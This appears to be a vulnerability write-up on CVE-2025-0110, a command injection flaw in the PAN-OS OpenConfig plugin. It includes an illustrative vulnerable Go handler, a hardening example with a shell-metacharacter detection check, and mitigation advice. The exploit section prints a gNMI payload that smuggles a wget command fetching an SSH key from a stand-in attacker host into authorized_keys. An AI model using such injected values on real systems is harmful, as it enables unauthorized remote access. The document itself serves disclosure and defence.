The Palo Alto Networks PAN-OS OpenConfig plugin has been found to have a command injection vulnerability (CVE-2025-0110) that allows authenticated administrators to bypass system restrictions and execute arbitrary commands. This post provides a detailed walkthrough of the vulnerability, including the affected code snippet, links to the original references, and exploit details.

Vulnerability Overview

A Command Injection vulnerability in the Palo Alto Networks PAN-OS OpenConfig plugin enables an authenticated administrator with the ability to make gNMI (gRPC Network Management Interface) requests to the PAN-OS management web interface to bypass system restrictions and run arbitrary commands. The commands are run as the "__openconfig" user on the firewall, which has the Device Administrator role with elevated privileges.

Code Snippet

Below is a code snippet from the gNMI request handling in the affected OpenConfig plugin for Palo Alto Networks PAN-OS:

package openconfig

import (
    "errors"
    "os/exec"

    "github.com/openconfig/gnmi/proto/gnmi"
)

// Example of vulnerable code snippet in the OpenConfig plugin
func handleRequest(request *gnmi.SetRequest) error {
    for _, update := range request.GetUpdate() {
        path := update.GetPath()
        value := update.GetVal()
        // Blocklist-style check: it only catches patterns it knows about,
        // so other shell metacharacters in value still get through.
        if isCommandInjection(value) {
            return errors.New("Command injection attempt detected")
        }
    }
    ...
    // exec.Command takes a variadic argument list; the request-derived
    // arguments reach the command without adequate validation.
    return exec.Command(cmdPath, prepareArguments(args)...).Run() // Vulnerable code
}

The vulnerability is caused by improper validation of user-supplied data that is passed to the exec.Command() function, allowing administrators to run arbitrary commands on the targeted system.
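The following Go program is an added example, not code from this page or from Palo Alto Networks, that places the vulnerable pattern beside its hardened form: a handler that splices a gNMI value into a single shell string, and a handler that allowlists the value and passes it as a separate argv element so shell metacharacters are never interpreted. The binary path /usr/local/bin/pan-apply-config, the function names and the allowlist pattern are assumptions; the sample value is constructed from the shape of the request shown in the next section, with the download replaced by a harmless echo, and the command is built but never executed.

```go
package main

import (
	"errors"
	"fmt"
	"os/exec"
	"regexp"
	"strings"
)

// Constructed sample: the same shape as the value in the gNMI SetRequest
// discussed in this post, with the download swapped for an inert echo.
const sampleInjectedValue = "; echo injected #"

// Vulnerable pattern: the gNMI value is concatenated into one shell string.
// Anything after ';' would be parsed by /bin/sh as a second command.
// (Binary path is a hypothetical placeholder.)
func buildShellCommand(value string) string {
	return "/usr/local/bin/pan-apply-config --value " + value
}

// Hardened pattern, step 1: allowlist validation. Only characters a
// configuration value is expected to contain are accepted; ';', '|', '&',
// '#', backticks and whitespace all fail the match. (Pattern is an assumption.)
var allowedValue = regexp.MustCompile(`^[A-Za-z0-9._:/=-]{1,256}$`)

func validateValue(value string) error {
	if !allowedValue.MatchString(value) {
		return errors.New("gNMI value contains characters outside the allowlist")
	}
	return nil
}

// Hardened pattern, step 2: build an argv, never a shell string. Each element
// goes straight to the binary as one argument, so even a value containing ';'
// would arrive as literal data. The command is constructed, not run.
func buildArgv(value string) ([]string, error) {
	if err := validateValue(value); err != nil {
		return nil, err
	}
	cmd := exec.Command("/usr/local/bin/pan-apply-config", "--value", value)
	return cmd.Args, nil
}

// Detection-side check for logged gNMI values: flags any value that the
// vulnerable pattern would have handed to the shell for interpretation.
func containsShellMetachar(value string) bool {
	return strings.ContainsAny(value, ";|&$`\n#<>")
}

func main() {
	fmt.Println("vulnerable shell string:", buildShellCommand(sampleInjectedValue))
	if _, err := buildArgv(sampleInjectedValue); err != nil {
		fmt.Println("hardened handler rejected value:", err)
	}
	argv, _ := buildArgv("interfaces.ethernet1/1.mtu=1500")
	fmt.Println("hardened argv:", argv)
	fmt.Println("suspicious:", containsShellMetachar(sampleInjectedValue))
}
```

The allowlist is the important half: an argv-based exec stops shell interpretation, but the receiving binary may still treat leading dashes or path components specially, so the value is constrained before it is placed in argv at all.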

Exploit Details & Mitigation

An attacker can exploit this vulnerability by making a specially crafted gNMI request to the PAN-OS management web interface containing malicious input. This input will bypass validation checks and ultimately be executed as a command on the targeted system.

To demonstrate the exploit, let's consider a scenario where an attacker sends a crafted gNMI request to add an unauthorized SSH public key to the "__openconfig" user's authorized_keys file:

// Example of a malicious gNMI SetRequest
{
    "update": [
        {
            "path": "/some/path",
            "val": "; wget http://attacker/server/evil_key.pub -O /home/__openconfig/.ssh/authorized_keys #"
        }
    ]
}

When processed by the vulnerable OpenConfig plugin, this request downloads the malicious SSH public key (evil_key.pub) from the attacker's server and adds it to the "__openconfig" user's authorized_keys file, granting the attacker remote access to the targeted system.

To mitigate this vulnerability, Palo Alto Networks recommends restricting access to the PAN-OS management web interface to only trusted internal IP addresses, as outlined in their best practices deployment guidelines:

https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431

Furthermore, it is essential to always keep PAN-OS and its associated plugins up to date with the latest security patches provided by Palo Alto Networks.

In conclusion, CVE-2025-0110 is a critical vulnerability that can lead to significant security risks for organizations using the Palo Alto Networks PAN-OS OpenConfig plugin. By following the recommended best practices and ensuring that systems are properly updated, administrators can significantly reduce the risk of being exploited by attackers.

Timeline

Published on: 02/12/2025 21:15:16 UTC